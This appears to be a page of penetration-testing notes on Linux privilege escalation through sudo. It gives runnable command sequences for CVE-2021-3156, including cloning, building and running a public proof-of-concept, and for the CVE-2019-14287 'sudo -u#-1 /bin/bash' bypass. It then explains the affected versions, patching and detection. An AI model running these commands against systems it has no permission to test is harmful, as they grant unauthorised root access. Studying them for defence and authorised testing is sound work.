LinkedInGithub
Edit

22.sudo

Check sudo version

sudo -V | head -n1

Check sudoers file (excluding comments and empty lines)

sudo cat /etc/sudoers | grep -v "#" | sed -r '/^\s*$/d'

Check OS version

cat /etc/lsb-release # or cat /etc/os-release

Clone exploit

git clone https://github.com/blasty/CVE-2021-3156.git
cd CVE-2021-3156

Compile exploit

make

Run exploit (replace <target_id> with the appropriate target ID)

./sudo-hax-me-a-sandwich <target_id>

Verify root access

id
whoami

Check sudo privileges

sudo -l

Check user ID (if needed)

cat /etc/passwd | grep <username>

Run command as root

sudo -u#-1 id
sudo -u#-1 /bin/bash # or /bin/sh

Verify root access

id
whoami

1. CVE-2021-3156 (Heap-Based Buffer Overflow):

  • Vulnerability:

    • Heap-based buffer overflow in sudo.

    • Affected versions: 1.8.31 (Ubuntu 20.04), 1.8.27 (Debian 10), 1.9.2 (Fedora 33), and others.

  • Exploitation:

    • Requires a Proof-of-Concept (PoC) exploit.

    • Compile and run the exploit.

    • Select the appropriate target (OS version).

  • Mitigation:

    • Update sudo to a patched version.

  • Commands:

    • sudo -V (check sudo version)

    • git clone https://github.com/blasty/CVE-2021-3156.git

    • make

    • ./sudo-hax-me-a-sandwich <target_id>

    • cat /etc/lsb-release (check OS version)

2. CVE-2019-14287 (Sudo Policy Bypass):

  • Vulnerability:

    • Allows bypassing sudo policy restrictions.

    • Affected sudo versions below 1.8.28.

    • Requires the user to be allowed to run a specific command via sudo.

  • Exploitation:

    • Use sudo -u#-1 <command> to run a command as root.

    • -u#-1 is interpreted as -u0 (root).

  • Mitigation:

    • Update sudo to a patched version.

  • Commands:

    • sudo -l (check sudo privileges)

    • cat /etc/passwd | grep <username> (check user ID)

    • sudo -u#-1 id

Important Considerations and Enhancements:

  • Vulnerability Severity:

    • Both vulnerabilities are critical.

    • They allow unprivileged users to gain root access.

  • Patching:

    • Keeping sudo updated is essential.

  • Sudo Configuration:

    • Properly configuring /etc/sudoers is crucial.

  • Exploit Reliability:

    • PoC exploits may require adjustments for specific systems.

  • Detection:

    • Monitor sudo logs for suspicious activity.

    • Use intrusion detection systems.

  • Real world examples: Researching real world sudo exploits will help solidify understanding of the attack vectors.

  • Sudoers file: more detail could be given about the syntax of the sudoers file.

  • Nopasswd: More detail could be given about the security implications of the NOPASSWD flag in the sudoers file.

Previous6.Recent 0-DaysNext23.polkit

Last updated